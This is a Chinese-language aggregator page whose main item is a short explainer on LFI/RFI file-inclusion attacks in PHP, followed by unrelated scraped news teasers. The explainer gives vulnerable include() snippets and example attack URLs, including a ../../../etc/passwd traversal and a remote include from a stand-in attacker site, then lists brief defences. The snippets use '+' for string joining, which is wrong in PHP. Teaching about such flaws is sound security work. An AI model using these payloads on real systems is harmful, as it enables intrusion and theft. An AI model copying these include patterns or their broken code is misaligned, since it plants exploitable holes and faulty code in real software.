范文健康探索娱乐情感热点
投稿投诉
热点动态
科技财经
情感日志
励志美文
娱乐时尚
游戏搞笑
探索旅游
历史星座
健康养生
美丽育儿
范文作文
教案论文

安全技术研究文件包含(LFIampampampRFI)攻击

  介绍
  文件包含漏洞利用应用程序中的动态文件包含机制,从不受信任的源导入恶意的可执行代码。通常当应用程序接受用户输入并将其传递到文件包含API时就会引发这类的漏洞,从而在易受攻击的应用程序上下文中加载恶意代码。
  通常,当漏洞允许在目标服务器上加载文件时称为本地文件包含(LFI),当攻击者能够在应用程序中加载远程代码时称为远程文件包含(RFI),这种技术增加了在目标服务器上执行恶意代码的机会。
  影响及危害
  此类漏洞的影响取决于应用程序如何使用所包含的文件,可能表现为基本的任意文件读取、还可以是服务器端请求伪造,甚至远程代码执行(RCE)。
  如果文件在应用程序的相同代码上下文中运行,这可能被用于在托管基础设施中执行远程代码(RCE)从而获得立足点,转向横向移动到整个网络中的其他服务系统执行未经授权的命令,并完全损害应用程序的机密性、完整性和可用性。
  场景
  在许多语言中都可能包含未经授权的文件,PHP特别容易受到RFI攻击,因为动态包含文件是PHP编程中广泛使用的模式。
  下面的代码片段存在LFI问题,用于通过用户提供的HTTP参数"template",动态加载指定的本地PHP文件。 <?php include("templates/" + $_GET["template"]); ?>
  攻击者可以通过向参数"template"传递恶意的本地路径来访问存在漏洞的PHP网页,进而访问不被允许的本地文件,例如/page. PHP ?template=../../../etc/passwd显示系统密码文件,或者/page.php?template=../upload/file以PHP脚本的形式运行一个意外文件。
  下面的RFI片段提供了对路径的第一部分的完全控制,允许攻击者加载远程url。 <?php include($_GET["template"] + ".php"); ?>
  攻击者可以在他控制的web服务器上驻留恶意PHP文件,然后通过访问/page.php?template=http://www.attackerwebsite.com/malicious ,在目标服务器上执行该malicious文件。
  如何防护
  可能的话,开发人员应该避免使用用户提供的输入构建文件路径字符串,特别是当资源公开给用户或在运行执行时。
  如果需要将用户提供的输入传递给文件系统API,开发人员必须确保以下内容:
  1.严格要求只接受已知的、信誉良好的候选对象来验证用户输入。
  2.如果无法根据允许列表进行验证,那么验证至少应该确保输入中只包含允许的内容。

古尔曼苹果没有在研发新款HomePodmini据彭博社记者MarkGurman报道,苹果很可能没有在研发新版的HomePod迷你智能音箱。在最新一期的PowerOn通讯中,Gurman解释说,他认为苹果没有积极地开发HomeP快递小哥过年了,我也想回家春节将至,各大电商平台都开启了年货节。年货消费高峰期,快递量也跟着成倍增长。春节前的快递量峰值,能达到日常的两倍左右。不过相比于快递量的短期爆发,更让快递公司们头疼的,还是春节期间泰国护照全球影响力全球第68位!泰国中华日报报道泰国在2023年亨利护照指数排名位列全球第68位和东盟第4位,旅游局启动兔年旅游推广行动,其中国内有部分天天出行,国外部分则主打5F战略,专注高品质游客群体。而酒店刚卸权,马云就去泰国打泰拳?泰拳一打,蚂蚁不再姓马。蚂蚁的马云时代已经落幕!卸权当天,马云现身曼谷泰拳赛馆观战,甚至拍摆出要与泰国传奇泰拳选手播求过招的架势。之后,马云在泰国继续旅游。马云带着家人到JayFa泰国警察总署敦促下属春节期间切勿谋取私利维护警方形象1月19日,据泰媒报道称,泰国国家警察总署发言人阿查勇透露,中国春节即将到来,1月2022日期间将有大量民众外出购物祭祀祖先出门旅游探亲,在此期间或存在生命财产安全威胁各类犯罪交通新年寄语2023简短励志1春晚是盘特色菜,年年需要调料拌酸甜苦辣咸,各色味道都放满吃的观众一会笑颜展,一会心儿酸齐聚来点缀,春晚才愿年年看!2今年过年不送礼,发条祝福语你,健康快乐长伴你,幸福美满粘着你,弱者就要被强者践踏,他们终于说了句实话我始终认为,一个社会文明与否,不是看高楼大厦有多少,而是要看如何对待弱者。我也一度认为,恃强凌弱这种事只会发生在万恶的资本主义国家。我们社会主义核心价值观就包含了平等公正法治等。平太湖之滨遇见梅好2023苏州太湖梅花节启幕啦又到一年赏梅时,暗香盈袖觅芳踪。昨天(1月18日),畅游太湖,遇见梅好2023苏州太湖梅花节开幕式在香雪海景区线上直播开幕,记者了解到,今年梅花节从1月18日开始到3月19日结束,杭州41个免费景点,太湖源头一游大好晴天,虽然气温有点偏低,过年也只剩二天了,但架不住想出去玩的冲动,那还等什么,又再次出发呗。太湖源风景区位于杭州临安区,开了导航后,一路向西的山区开进,沿着水库旁边峭壁,弯转弯孔子被称为圣人,他的文化水平相当于现在什么级别,说了你别不信有道是,三人行必有我师,说起孔子在当代的影响力,从中国校园里大大小小的塑像,全球各处的学院可见一二,可以说是但凡华人扎根之处,必有孔子存在的足迹。作为将仁与礼字中华大地上,奠定中国赫拉一个专注打小三的天后娘娘赫拉,神王宙斯权力的共享者,至高无上的第三代天后。主掌婚姻和生育的赫拉,是最早的女权主义者,她倡导一夫一妻制。但讽刺的是,她的丈夫宙斯却风流成性,频频出轨。赫拉拿他无可奈何,只能对
新型探测器可实现高速量子通信新型探测器由硅芯片上的32根氮化铌超导纳米线制成,可实现高精度的高计数率。来源RyanLannom,JPLCaltechNASA研究人员开发了一种新型探测器,可以以非常高的速率精确180亿公里外,探测器遭遇5万度火墙,人类被锁死在太阳系内?在阅读此文前,麻烦您点击一下关注,既方便您进行讨论与分享,又给您带来不一样的参与感,深度长文,希望您能够认真看完,感谢您的支持!探索宇宙是人类走出地球之后的终极梦想,当人类走出地球人类首次月背采样返回,欧空局撕毁协议后,嫦娥六号是否继续合作前段时间,欧洲航天局局长约瑟夫阿施巴赫近日对外公开表示目前没有将欧洲航天员送到新建设完成的中国天宫空间站的计划,该机构既没有预算能力,也没有政治意图将其宇航员送往中国空间站。但是阿因为宇宙一片漆黑,所以地球才有昼夜之分,宇宙为什么是黑的?头条创作挑战赛地球为何会有昼夜之分?乍一看,这个问题很是简单,当然是因为地球一直在自自转了,当地球的一部分被太阳照射时就是白昼,而当这一面因自转背对太阳时就进入了黑夜。其实,自转只还记得挑战者号吗1986年1月28日上午1139,原定于从佛罗里达州卡纳维拉尔角(肯尼迪发射中心)例行发射的挑战者号航天飞机在飞行仅73秒后爆炸,机上七名美国人全部遇难。这场灾难震惊了全国,并导致罕见绿彗星将与地球擦肩而过一颗曾在石器时代与地球擦肩而过的罕见绿色彗星将于2月2日归来。这颗彗星名为C2022E3,由美国兹威基瞬态研究设施在2022年3月首次发现。它大部分时间处于太阳系最外围的奥尔特云(A股节后(1月30日2月3日)股市走势简析,两大因素是关键!隔夜美PCE数据利好加持下,欧美股市继续上涨,A股休市一周,外围整体环境还是呈现出了暖春气息!那么在加息周VS兔年首秀的大背景下,下周A股将何去何从?又有哪些机会可以上车呢?按照以平顶山卫东农商行节后开工忙大象新闻记者王甜甜河南广电融媒体记者罗聪文图视频视频加载中大娘,您今天过来办理什么业务?您坐那儿等待一下,我帮您取个号。1月29日,在平顶山卫东农村商业银行(以下简称卫东农商银行)潮家发现看家装72变卫生间防滑,地砖就选这六种视频加载中编者按潮家发现看家装72变是由红网家居携手金空间装饰策划推出的一档视频类原创居家学装修栏目,每期根据室内不同功能分区,学装修,看家装如何72变。专题潮家发现看家装72变通乡镇卫生院何去何从刚看到一篇文章说区县级电视台处境尴尬,没人看。其实,乡镇卫生院也尴尬,也是没有人看。小病去村里的药铺诊所。大病去县医院市医院。县医院市医院人满为患,停车一位难求。看病的人多的时候,春晚三位女主持龙洋马凡舒王嘉宁,你看好谁?2023年春晚主持人已经官宣任鲁豫撒贝宁尼格买提龙洋马凡舒王嘉宁。您会更喜爱谁的风格?这个组合,也呈现出有趣的年龄搭配任鲁豫46岁,撒贝宁47岁,尼格买提40岁,龙洋34岁,马凡舒